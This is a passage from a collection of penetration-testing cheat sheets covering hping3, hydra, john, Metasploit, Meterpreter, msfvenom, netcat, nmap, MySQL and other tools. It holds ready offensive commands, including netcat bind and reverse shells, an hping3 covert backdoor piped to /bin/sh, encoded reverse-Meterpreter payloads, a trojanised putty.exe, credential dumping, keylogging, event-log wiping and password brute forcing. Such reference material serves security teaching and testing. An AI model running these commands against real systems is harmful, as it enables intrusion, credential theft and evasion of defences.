   +port          increment the port for each reply
   ++port         increment the port for each packet sent
--keep            keep the source port fixed
-w --win          window size [64]
-O --tcpoff       set a fake tcp data offset
-b --badcksum     send packets with a bad IP checksum
-M --setseq       set the tcp sequence number
-L --setack       set the tcp ack
-Q --seqnum       show only tcp sequence numbers
--tcp-timestamp   enable the TCP timestamp option

#TCP FLAGS
-F --fin   -S --syn   -R --rst
-P --push  -A --ack   -U --urg
-X --xmas  -Y --ymas

#PROTOCOL SELECTION
-0 --rawip   -1 --icmp   -2 --udp
-8 --scan    scan mode, port spec:
   range, ex: 20-53
   comma delimited, ex: 1,3,4
   known: ports from /etc/services
   negated with !, ex: 1-53,!4
-9 --listen  listen mode (string match)

#EXAMPLES
Uptime:   hping3 -p 80 -S --tcp-timestamp host
PortScan: hping3 -I eth0 --scan 20-25,80,443 -S host
Synflood: hping3 -p 80 -i u10000 -a source -S host
Backdoor (hping as a covert channel; the payload after the signature is piped into a shell):
  server: hping3 -I eth1 -9 secret | /bin/sh
  client: hping3 -R ip -e secret -E command_file -d 100 -c 1

#ICMP TYPES (the -C / --icmptype value; -K / --icmpcode sets the code within a type)
0  Echo Reply
1  Unassigned
2  Unassigned
3  Destination Unreachable
4  Source Quench
5  Redirect
6  Alternate Host Address
7  Unassigned
8  Echo (request)
9  Router Advertisement
10 Router Solicitation
11 Time Exceeded
12 Parameter Problem
13 Timestamp
14 Timestamp Reply
15 Information Request
16 Information Reply
17 Address Mask Request
18 Address Mask Reply
19 Reserved (for security)
20-29 Reserved (experimental)
30 Traceroute
31 Datagram Conversion Error
32 Mobile Host Redirect
33 IPv6 Where-Are-You
34 IPv6 I-Am-Here
35 Mobile Registration Request
36 Mobile Registration Reply
37 Domain Name Request
38 Domain Name Reply
39 SKIP
40 Photuris
41-255 Reserved

--------------------------------------------------------------------------------
/http:
--------------------------------------------------------------------------------
#HTTP Authentication Types
Digest Authentication (uses htdigest)
-->susceptible to MITM attack!
Integrated Windows Authentication
-->will not function over a proxy
Form-Based Authentication
-->not inherently encrypted, often poorly implemented

[------------------------- HTTP Response Codes ---------------------------]
#Informational Response Codes (1xx)
100 - Continue
101 - Switching Protocols
102 - Processing

#Success Response Codes (2xx)
200 - OK                        206 - Partial Content
201 - Created                   207 - Multi-Status
202 - Accepted                  208 - Already Reported
203 - Non-Authoritative Info    226 - IM Used
204 - No Content                250 - Low Storage Space (non-standard)
205 - Reset Content

#Redirection Response Codes (3xx)
300 - Multiple Choices          304 - Not Modified
301 - Moved Permanently         305 - Use Proxy
302 - Found                     307 - Temporary Redirect
303 - See Other                 308 - Permanent Redirect

#Client Error Response Codes (4xx)
400 - Bad Request               410 - Gone
401 - Unauthorized              411 - Length Required
402 - Payment Required          412 - Precondition Failed
403 - Forbidden                 413 - Payload Too Large
404 - Not Found                 414 - URI Too Long
405 - Method Not Allowed        415 - Unsupported Media Type
406 - Not Acceptable            416 - Range Not Satisfiable
407 - Proxy Auth Required       417 - Expectation Failed
408 - Request Timeout           418 - I'm a teapot
409 - Conflict

#Server Error Response Codes (5xx)
500 - Internal Server Error     508 - Loop Detected
501 - Not Implemented           509 - Bandwidth Limit Exceeded (non-standard)
502 - Bad Gateway               510 - Not Extended
503 - Service Unavailable       511 - Network Auth Required
504 - Gateway Timeout           550 - Permission Denied (non-standard)
505 - HTTP Ver Not Supported    551 - Option Not Supported (non-standard)
506 - Variant Also Negotiates   598 - Network Read Timeout Error (non-standard)
507 - Insufficient Storage      599 - Network Connect Timeout Error (non-standard)

--------------------------------------------------------------------------------
/https-ssl-tls:
--------------------------------------------------------------------------------
#https is http carried over an encrypted session
-->Transport Layer Security (TLS) is used to encrypt the entire session

#TLS does a handshake in which the client checks the server's certificate (its public key) and both sides agree on key material
-->from that key material a master secret is derived, which both client and server use to compute the session keys

***With RSA key exchange the client encrypts the pre-master secret to the server's public key, so anyone who later obtains the server's private key can decrypt captured sessions; (EC)DHE key exchange (forward secrecy) prevents this

#SSL is the predecessor to TLS and should no longer be used (SSLv3 is deprecated by RFC 7568), but TLS was built on the same framework

--------------------------------------------------------------------------------
/hydra:
--------------------------------------------------------------------------------
#hydra does not have a native default wordlist; using the rockyou list is suggested

#example brute force attack on an ftp server
hydra -t 1 -l admin -P [path to password.lst] -vV [IPaddress] ftp
--> -t # = run # parallel tasks (keep it low for ftp/ssh, more connections mean dropped attempts and lockouts)
--> -l NAME = try to log in with NAME
--> -P [filepath] = try each password from the file
--> -vV = verbose mode, showing the login+pass for each attempt

#check for "joe" accounts (password identical to the username) by adding the modifier -e s

#to write found login+pass combinations to a file, add the modifier -o [filename]

--------------------------------------------------------------------------------
/john:
--------------------------------------------------------------------------------
#To benchmark the hash types John can crack, with crack speed (in cracks/second)
john --test

#Cracking Modes
#To use your own word list (the rockyou list is suggested)
john --wordlist=[filename] [passwordfile]

#Incremental mode (brute force)
john --incremental hashfile

#To show your results after running john (reads the cracked hashes from ~/.john/john.pot)
john --show [passwordfile]

#Session and Restore
#To restore an interrupted john session
john --restore=name

--------------------------------------------------------------------------------
/maltego:
--------------------------------------------------------------------------------
# michael
# To do a basic footprinting of a domain
Machines>"Run Machine">"Footprint L1"

# To do a footprinting and follow every link of a domain
Machines>"Run Machine">"Footprint L2"

# To find a person's email address from a domain
Machines>"Run Machine">"Person - Email Address"

# To create a custom attack
Machines>"New Machine"

# To create a new data type
Manage>"New Entity Type"

# To run a transform on collected data
[In the graph, right click]>"Run Transform">[Select Transform]

# To create a new way to manipulate data
Manage>"Local Transform"

# To get the latest transforms from currently set servers
Manage>"Discover Transforms">"Discover Transforms"

# To get transforms from specific servers
Manage>"Discover Transforms">"Discover Transforms (Advanced)"

--------------------------------------------------------------------------------
/markdown:
--------------------------------------------------------------------------------
# andrew
# I also have trouble remembering markdown syntax...
# headers
h1 header
=========
h2 header
---------

# blockquotes
> first level and paragraph
>> second level and first paragraph
>
> first level and second paragraph

# lists
## unordered - use *, +, or -
* Red
* Green
* Blue

## ordered
1. First
2. Second
3.
Third 25 | 26 | # code - use 4 spaces/1 tab 27 | regular text 28 | code code code 29 | or: 30 | Use the `printf()` function 31 | 32 | # hr's - three or more of the following 33 | *** 34 | --- 35 | ___ 36 | 37 | # links 38 | This is [an example](http://example.com "Title") inline link. 39 | 40 | # emphasis 41 | *em* _em_ 42 | 43 | **strong** __strong__ 44 | -------------------------------------------------------------------------------- /medusa: -------------------------------------------------------------------------------- 1 | # alex 2 | # To display all currently installed modules 3 | medusa -d 4 | 5 | # Display specific options for a module 6 | medusa -M [module_name] -q 7 | 8 | # Test all passwords in password file against the admin user on the host 9 | # 192.168.1.20 via the SMB | SSH | MySQL | HTTP service 10 | medusa -h 192.168.1.20 -u admin -P passwords.txt -M [smbnt | ssh | mssql | http] 11 | 12 | # To brute force 10 hosts and 5 users concurrently (using Medusa's parallel features) 13 | # Each of the 5 threads targeting a host will check a specific user 14 | medusa -H hosts.txt -U users.txt -P passwords.txt -T 10 -t 5 -L -F -M smbnt 15 | 16 | 17 | # Medusa allows username, password, and host data to be placed within the same file (the "combo" file). 
# Possible combinations in the combo file:

# host:username:password
# host:username:
# host::
# :username:password
# :username:
# ::password
# host::password
# :id:lm:ntlm::: (PwDump files)


# To test each username/password entry in the file combo.txt
medusa -M smbnt -C combo.txt

--------------------------------------------------------------------------------
/metasploit:
--------------------------------------------------------------------------------
**Metasploit Console Basics**

#Search for module:
msf > search [regex]

#Specify an exploit to use:
msf > use exploit/[ExploitPath]

#Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]

#Show options for the current module:
msf > show options

#Set options:
msf > set [Option] [Value]

#Start exploit:
msf > exploit

**Useful Auxiliary Modules**

#Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

#DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

#FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

#Proxy Server
msf > use auxiliary/server/socks4
msf > run


**msfvenom**
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with '-l payloads' to get a list of payloads.

$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]

#Example
Reverse Meterpreter payload as an executable and redirected into a file:

$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe

#Format Options (specified with -f)
--help-formats - List available output formats
exe - Executable
pl - Perl
rb - Ruby
raw - Raw shellcode
c - C code

#Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders' to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]

#Example
Encode a payload from msfpayload 5 times using the shikata_ga_nai encoder and output as executable:

$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

**Metasploit Meterpreter**

#Base Commands:
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory

#File System Commands:
cd: Change directory
lcd: Change directory on local (attacker's) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)

#Process Commands:

getpid: Display the process ID that Meterpreter is running inside
getuid: Display the user ID that Meterpreter is running with
ps: Display process list
kill: Terminate a process given its process ID
execute: Run a given program with the privileges of the process the Meterpreter is loaded in
migrate: Jump to a given destination process ID
  - Target process must have same or lesser privileges
  - Target process may be a more stable process
  - When inside a process, can access any files that process has a lock on

#Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system's routing table

#Misc Commands:
idletime: Display the duration that the GUI of the target machine has been idle
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine
screenshot: Save as an image a screenshot of the target machine

#Additional Modules:
use [module]: Load the specified module

#Example:
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp: Alter NTFS file timestamps

**Managing Sessions**

#Multiple Exploitation:

#Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z

#Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit -j

#List all current jobs (usually exploit listeners):
msf > jobs -l

#Kill a job:
msf > jobs -k [JobID]

#Multiple Sessions:

#List all backgrounded sessions:
msf > sessions -l

#Interact with a backgrounded session:
msf > sessions -i [SessionID]

#Background the current interactive session:
meterpreter > [Ctrl+Z]
or
meterpreter > background

#Routing Through Sessions:

All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]


--------------------------------------------------------------------------------
/meterpreter:
--------------------------------------------------------------------------------
#Meterpreter Cheat Sheet
#Jason Soto

#Core Commands
?                         Help menu
background                Backgrounds the current session
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information about active channels
close                     Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
help                      Help menu
info                      Displays information about a Post module
interact                  Interacts with a channel
irb                       Drop into irb scripting mode
load                      Load one or more meterpreter extensions
migrate                   Migrate the server to another process
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
use                       Deprecated alias for 'load'
write                     Writes data to a channel


#Stdapi: File system Commands
cat                       Read the contents of a file to the screen
cd                        Change directory
download                  Download a file or directory
edit                      Edit a file
getlwd                    Print local working directory
getwd                     Print working directory
lcd                       Change local working directory
lpwd                      Print local working directory
ls                        List files
mkdir                     Make directory
mv                        Move source to destination
pwd                       Print working directory
rm                        Delete the specified file
rmdir                     Remove directory
search                    Search for files
upload                    Upload a file or directory


#Stdapi: Networking Commands
arp                       Display the host ARP cache
getproxy                  Display the current proxy configuration
ifconfig                  Display interfaces
ipconfig                  Display interfaces
netstat                   Display the network connections
portfwd                   Forward a local port to a remote service
route                     View and modify the routing table


#Stdapi: System Commands
clearev                   Clear the event log
drop_token                Relinquishes any active impersonation token.
execute                   Execute a command
getenv                    Get one or more environment variable values
getpid                    Get the current process identifier
getprivs                  Attempt to enable all privileges available to the current process
getsid                    Get the SID of the user that the server is running as
getuid                    Get the user that the server is running as
kill                      Terminate a process
ps                        List running processes
reboot                    Reboots the remote computer
reg                       Modify and interact with the remote registry
rev2self                  Calls RevertToSelf() on the remote machine
shell                     Drop into a system command shell
shutdown                  Shuts down the remote computer
steal_token               Attempts to steal an impersonation token from the target process
suspend                   Suspends or resumes a list of processes
sysinfo                   Gets information about the remote system, such as OS


#Stdapi: User interface Commands
enumdesktops              List all accessible desktops and window stations
getdesktop                Get the current meterpreter desktop
idletime                  Returns the number of seconds the remote user has been idle
keyscan_dump              Dump the keystroke buffer
keyscan_start             Start capturing keystrokes
keyscan_stop              Stop capturing keystrokes
screenshot                Grab a screenshot of the interactive desktop
setdesktop                Change the meterpreter's current desktop
uictl                     Control some of the user interface components


#Stdapi: Webcam Commands
record_mic                Record audio from the default microphone for X seconds
webcam_chat               Start a video chat
webcam_list               List webcams
webcam_snap               Take a snapshot from the specified webcam
webcam_stream             Play a video stream from the specified webcam


#Priv: Elevate Commands
getsystem                 Attempt to elevate your privilege to that of local system.


#Priv: Password database Commands
hashdump                  Dumps the contents of the SAM database


#Priv: Timestomp Commands
timestomp                 Manipulate file MACE attributes

#Commands by Meterpreter extensions

#Incognito Commands
add_group_user            Attempt to add a user to a global group with all tokens
add_localgroup_user       Attempt to add a user to a local group with all tokens
add_user                  Attempt to add a user with all tokens
impersonate_token         Impersonate specified token
list_tokens               List tokens available under current user context
snarf_hashes              Snarf challenge/response hashes for every token


#Mimikatz Commands
kerberos                  Attempt to retrieve kerberos creds
livessp                   Attempt to retrieve livessp creds
mimikatz_command          Run a custom command
msv                       Attempt to retrieve msv creds (hashes)
ssp                       Attempt to retrieve ssp creds
tspkg                     Attempt to retrieve tspkg creds
wdigest                   Attempt to retrieve wdigest creds


#Sniffer Commands
sniffer_dump              Retrieve captured packet data to PCAP file
sniffer_interfaces        Enumerate all sniffable network interfaces
sniffer_release           Free captured packets on a specific interface instead of downloading them
sniffer_start             Start packet capture on a specific interface
sniffer_stats             View statistics of an active capture
sniffer_stop              Stop packet capture on a specific interface


#Lanattacks: DHCP Commands
dhcp_load_options         Load DHCP options from a datastore
dhcp_log                  Log DHCP server activity
dhcp_reset                Reset the DHCP server
dhcp_set_option           Set a DHCP server option
dhcp_start                Start the DHCP server
dhcp_stop                 Stop the DHCP server


#Lanattacks: TFTP Commands
tftp_add_file             Add a file to the TFTP server
tftp_reset                Reset the TFTP server
tftp_start                Start the TFTP server
tftp_stop                 Stop the TFTP server


#Espia Commands
screengrab                Attempt to grab screen shot from process's active desktop


#Examples
#Migrate to a given process ID

meterpreter > migrate 1450

#Load meterpreter extension

meterpreter > load mimikatz
meterpreter > load incognito

#Get info on a Post Module

meterpreter > info [post_module]

#Privilege Escalation

meterpreter > use priv
meterpreter > getsystem
meterpreter > getuid

#Steal Token
meterpreter > steal_token [user PID]

#Example
meterpreter > steal_token 420

#Token Impersonation
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token DOMAIN\User

#Attempt to create user on Domain Controller
meterpreter > add_user newuser password -h 192.168.20.30

#Use Meterpreter Session to Pivot onto other Systems

meterpreter > run get_local_subnets
meterpreter > background
msf exploit(handler) > route add [subnet] [netmask] [session]

#run Post modules
meterpreter > run [postmodule]

#Example
meterpreter > run killav
meterpreter > run hashdump
meterpreter > run persistence

#See all post modules you can run
meterpreter > run

#Attempt to retrieve Kerberos or Livessp credentials
meterpreter > load mimikatz
meterpreter > kerberos
meterpreter > livessp


--------------------------------------------------------------------------------
/msfvenom:
--------------------------------------------------------------------------------
#MSFVenom CheatSheet
#Jason Soto

#Basic Syntax
msfvenom [options]

#Options

-p, --payload           Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type] List a module type, example: payloads, encoders, nops, all
-n, --nopsled           Prepend a nopsled of [length] size on to the payload
-f, --format            Output format (use --help-formats for a list)
-e, --encoder [encoder] The encoder to use
-a, --arch              The architecture to use
    --platform          The platform of the payload
-s, --space             The maximum size of the resulting payload
-b, --bad-chars         The list of characters to avoid, example: '\x00\xff'
-i, --iterations        The number of times to encode the payload
-c, --add-code          Specify an additional win32 shellcode file to include
-x, --template          Specify a custom executable file to use as a template
-k, --keep              Preserve the template behavior and inject the payload as a new thread
    --payload-options   List the payload's standard options
-o, --out               Save the payload
-v, --var-name          Specify a custom variable name to use for certain output formats
-h, --help              Show this message
    --help-formats      List available formats

# Format Options (Specified with -f)
#Executable formats
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war

#Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

#Creating a Payload
$ msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]

#Example
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.20 LPORT=443 -f exe -o exepayload.exe

#Check payload options
$ msfvenom -p [payload] --payload-options

#Example
$ msfvenom -p windows/meterpreter/reverse_tcp --payload-options

#Encoding a Payload
$ msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile

#Encoders available

#Framework Encoders

Name                          Rank       Description
----                          ----       -----------
cmd/echo                      good       Echo Command Encoder
cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
cmd/ifs                       low        Generic ${IFS} Substitution Command Encoder
cmd/perl                      normal     Perl Command Encoder
cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar                 manual     The EICAR Encoder
generic/none                  normal     The "none" Encoder
mipsbe/byte_xori              normal     Byte XORi Encoder
mipsbe/longxor                normal     XOR Encoder
mipsle/byte_xori              normal     Byte XORi Encoder
mipsle/longxor                normal     XOR Encoder
php/base64                    great      PHP Base64 Encoder
ppc/longxor                   normal     PPC LongXOR Encoder
ppc/longxor_tag               normal     PPC LongXOR Encoder
sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
x64/xor                       normal     XOR Encoder
x86/add_sub                   manual     Add/Sub Encoder
x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
x86/countdown                 normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
x86/nonalpha                  low        Non-Alpha Encoder
x86/nonupper                  low        Non-Upper Encoder
x86/opt_sub                   manual     Sub Encoder (optimised)
x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit         manual     Single Static Bit
x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

#Example
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.40 LPORT=4444 -e x86/shikata_ga_nai -f exe -o payload.exe

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o payload.exe

#Example
#Remove Bad Characters
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -b '\x00' -f exe -o payload.exe

#Creating a Payload using a template
msfvenom -p [payload] -x [template] -f [formattype] > outputfile

#Example
#Creating executable payload using putty.exe as template
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -x putty.exe -f exe > evilputty.exe



--------------------------------------------------------------------------------
/mysql:
--------------------------------------------------------------------------------
# alex
# To connect to a database
mysql -h localhost -u root -p

# To backup all databases
mysqldump --all-databases --all-routines -u root -p > ~/fulldump.sql

# To restore all databases
mysql -u root -p < ~/fulldump.sql

# To create a database in utf8 charset
CREATE DATABASE owa CHARACTER SET utf8 COLLATE utf8_general_ci;

# Types of user permissions:

# ALL PRIVILEGES - gives user full unrestricted access
# CREATE - allows user to create new tables or databases
# DROP - allows user to delete tables or databases
# DELETE - allows user to delete rows from tables
# INSERT - allows user to insert rows into tables
# SELECT - allows user to use the SELECT command to read through databases
# UPDATE - allows user to update table rows
# GRANT OPTION - allows user to grant or remove other users' privileges

# To grant specific permissions to a particular user
GRANT permission_type ON database_name.table_name TO 'username'@'hostname';

# To add a user and give rights on the given database
GRANT ALL PRIVILEGES ON database.* TO 'user'@'localhost' IDENTIFIED BY 'password' WITH GRANT OPTION;

# To change the root password
SET PASSWORD FOR root@localhost=PASSWORD('new_password');

# To delete a database
DROP DATABASE database_name;

# To reload privileges from MySQL grant table
FLUSH PRIVILEGES;

# Show permissions for a particular user
SHOW GRANTS FOR 'username'@'hostname';

# Find out who the current user is
SELECT CURRENT_USER();

# To delete a table in the database
DROP TABLE table_name;

# To return all records from a particular table
SELECT * FROM table_name;

# To create a table (Users table used as example)
# Note: Since username is a primary key, it is NOT NULL by default. Email is optional in this example.
CREATE TABLE Users (
    username VARCHAR(80),
    password VARCHAR(80) NOT NULL,
    email VARCHAR(80),
    PRIMARY KEY (username)
);

# To disable general logging
set global general_log=0;

--------------------------------------------------------------------------------
/ncat:
--------------------------------------------------------------------------------
# andrew
# Connect mode (ncat is client) | default port is 31337
ncat [host] [port]

# Listen mode (ncat is server) | default port is 31337
ncat -l [host] [port]

# Transfer file (closes after one transfer)
ncat -l [host] [port] < file

# Transfer file (stays open for multiple transfers)
ncat -l --keep-open [host] [port] < file

# Receive file
ncat [host] [port] > file

# Brokering | allows for multiple clients to connect
ncat -l --broker [host] [port]

# Listen with SSL | many options, use ncat --help for full list
ncat -l --ssl [host] [port]

# Access control
ncat -l --allow [host]
ncat -l --deny [host]

# Proxying
ncat --proxy [proxyhost:port] --proxy-type {http | socks4} [target]

# Chat server | can use brokering for multi-user chat
ncat -l --chat [host] [port]

--------------------------------------------------------------------------------
/nessus:
--------------------------------------------------------------------------------
# Jose Moruno Cadima <@sniferl4bs>
#Nessus
#SERVER
nessusd [-c config-file] [-a address] [-p port-number] [-D] [-d]
-c (config file)                -a (address)
-p (port number)                -D (daemon mode)
-v (version info)               -h (help)
-d (dumps compilation options)

#CLIENT
nessus [-v][-h][-n][-T type][-q [-pPS] host port user password targets results
-c (config file)                -q (quiet/batch mode)
-p (obtain plugin-list)         -P (obtain plugin preferences)
-S (SQL output for -p and -P)   -V (verbose)
-x (don't check SSL certs)      -v (version)
-h (help)                       -n (no-pixmaps)

#Server connection parameters
Host: IP of nessusd server
20 | Port: Port on which nessusd server is running (default 1241) 21 | User: User name to use for connecting to nessusd. 22 | Password: Login credentials 23 | 24 | #Output format 25 | -T nbe -T html -T html 26 | _graph 27 | -T text -T xml -T old-xml 28 | -T tex -T nsr 29 | 30 | #Example 31 | nessus –qa –T nbe 127.0.0.1 1241 john d03 targets.txt results.nbe 32 | 33 | #Report Conversion 34 | nessus -i in.[nsr|nbe] -o out.[html|xml|nsr|nbe] 35 | -------------------------------------------------------------------------------- /netcat: -------------------------------------------------------------------------------- 1 | # Netcat Cheat Sheet 2 | # Jose Moruno Cadima 3 | 4 | #Transfering a File 5 | nc -lvp 4444 > output.txt #Recei 6 | nc -nv < input.txt #Send 7 | 8 | #Netcat Bind Shell (Windows) 9 | nc -lvp 4444 -e cmd.exe 10 | nc -nv 4444 #Connect to the shell 11 | 12 | #Netcat Bind Shell (Linux) 13 | nc -lvp 4444 -e /bin/sh 14 | nc -nv 4444 #Connect to the shell 15 | 16 | #Netcat Reverse Shell (Windows) 17 | nc -lvp 443 # Listening for connection 18 | nc -nv 443 -e cmd.exe 19 | 20 | #Netcat Reverse Shell (Linux) 21 | nc -lvp 443 22 | nc -nv 443 -e /bin/sh 23 | 24 | #Netcat - Port Scanner 25 | nc -z 26 | 27 | #Netcat Banner Grabbing 28 | echo "" | nc -nv -w1 29 | -------------------------------------------------------------------------------- /nikto: -------------------------------------------------------------------------------- 1 | # alex 2 | # Contributor: Jose Moruno Cadima 3 | 4 | # To scan a particular host 5 | nikto.pl -host [host IP/name] 6 | 7 | # To scan a host on multiple ports (default = 80) 8 | nikto.pl -host [host IP/name] -port [port number 1], [port number 2], [port number 3] 9 | 10 | # To scan a host and output fingerprinted information to a file 11 | nikto.pl -host [host IP/name] -output [output_file] 12 | 13 | # To use a proxy while scanning a host 14 | nikto.pl -host [host IP/name] -useproxy [proxy address] 15 | 16 | #Display Options -Display 17 | 18 | 
1 Show redirects 19 | 2 Show cookies received 20 | 3 Show all 200/OK responses 21 | 4 Show URLs which require authentication 22 | D Debug output 23 | E Display all HTTP errors 24 | 25 | 26 | -------------------------------------------------------------------------------- /nmap: -------------------------------------------------------------------------------- 1 | # Nmap Cheat Sheet 2 | #Jose Moruno Cadima 3 | 4 | #Basic Syntax 5 | nmap [ScanType] [Options] {targets} 6 | 7 | #Target Specification 8 | IPv4 address: 192.168.1.1 9 | IPv6 address: AABB:CCDD::FF:: 10 | Host name: www.sniferl4bs.com 11 | IP address range: 192.168.0-255 12 | Use file with lists of targets: -iL 13 | 14 | 15 | #Target Ports 16 | No port range specified scans 1,000 most popular ports 17 | 18 | -F Scan 100 most popular ports 19 | -p- Port range 20 | -p,,... Port List 21 | --top-ports Scan n most popular ports 22 | 23 | #Scan Types 24 | 25 | -O OS Detection 26 | -sP Probe only host live scan 27 | -sS SYN Scan 28 | -sT TCP Connect Scan 29 | -sU UDP Scan 30 | -sV Version Scan 31 | 32 | #Output Formats 33 | 34 | -oN Standard Nmap output 35 | -oX XML format 36 | 37 | #Timing Options 38 | 39 | -T0 Paranoid: Very slow, used for IDS evasion 40 | -T1 Sneaky: Quite slow, used for IDS evasion 41 | -T2 Polite: Slows down to consume less 42 | bandwidth, runs ~10 times slower than 43 | default 44 | -T3 Normal: Default, a dynamic timing model 45 | based on target responsiveness 46 | -T4 Aggressive: Assumes a fast and reliable 47 | network and may overwhelm targets 48 | -T5 Insane: Very aggressive; will likely 49 | overwhelm targets or miss open ports 50 | -------------------------------------------------------------------------------- /nping: -------------------------------------------------------------------------------- 1 | # alexbujduveanu 2 | 3 | # To perform a TCP connect() (handshake) with a host 4 | nping --tcp-connect [target host] 5 | 6 | # To perform a TCP connect() 7 | nping --tcp-connect [target 
host] [target host] [target host]

# To attempt a TCP handshake on a port range (1-80)
nping --tcp-connect [target host] -p1-80 -c 1

# To send a UDP packet with 50 bytes of random data (to port 53 in this example)
nping --udp [target host] -p 53 --data-length 100

# Send 500 TCP packets at a rate of 50 packets per second
nping --tcp [target host] --rate 50 -c 500

# To send an ARP request to a particular host
nping --arp [target host]

# To send ARP requests to all hosts in the 192.168.1.0/24 network
nping --arp 192.168.1.0/24

# To send an ICMP echo request
nping [target host] --icmp --icmp-type echo

# To send an ICMP echo reply
nping google.com --icmp --icmp-type echo-reply

# To send a packet with a bad checksum from port 1221 to port 80
nping --udp --badsum --source-port 1221 -p 80 [target host]

# To set how verbose the output should be, append '-v' followed by an integer between -4 (no output) and 4 (very verbose)

--------------------------------------------------------------------------------
/permissions:
--------------------------------------------------------------------------------
# andrew
# file permissions
-         rw-            r--            r--
filetype  u-permissions  g-permissions  o-permissions

# file properties
1          root   root   1845          Dec 9 3:34   /etc/shadow
num-links  owner  group  inode-number  date/time    file-name

# chmod
Each of r, w, x is one bit: 1 if set, 0 if not
Convert each three-bit triplet to a digit (0-7)
chmod ### filename

## Example: rwx rw- r--
chmod 764 filename

--------------------------------------------------------------------------------
/php:
--------------------------------------------------------------------------------
# andrew
# basic sql injection prevention (prepared statement; values are bound, never concatenated into the query)
$sth = $db->prepare("SELECT * FROM table WHERE username=?
and password=?");
$sth->execute([$pUsername, $pPassword]);
$results = $sth->fetchAll(PDO::FETCH_ASSOC);

# basic xss prevention
strip_tags($string); # http://www.php.net/manual/en/function.strip-tags.php

## can also allow certain tags:
strip_tags($string, $allowed_tags);

# strip out HTML and special characters
# source: http://stackoverflow.com/questions/7128856/strip-out-html-and-special-characters
$clear = trim(preg_replace('/ +/', ' ', preg_replace('/[^A-Za-z0-9 ]/', ' ', urldecode(html_entity_decode(strip_tags($des))))));

--------------------------------------------------------------------------------
/pivoting:
--------------------------------------------------------------------------------
# alex

# To make a FIFO in the file system
mknod [name of file] p

# Pivoting with a backpipe #
# On the attacker:
nc [pivot host] 4444

# On the pivot host
nc localhost 80 <[FIFO file name] | nc -l -p 4444 >[FIFO file name]

# Telnet variant (when netcat is not available on the target) #
# Listen on port 80 in terminal 1 on the attack machine
nc -l -n -v -p 80

# Listen on port 443 in terminal 2 on the attack machine
nc -l -n -v -p 443

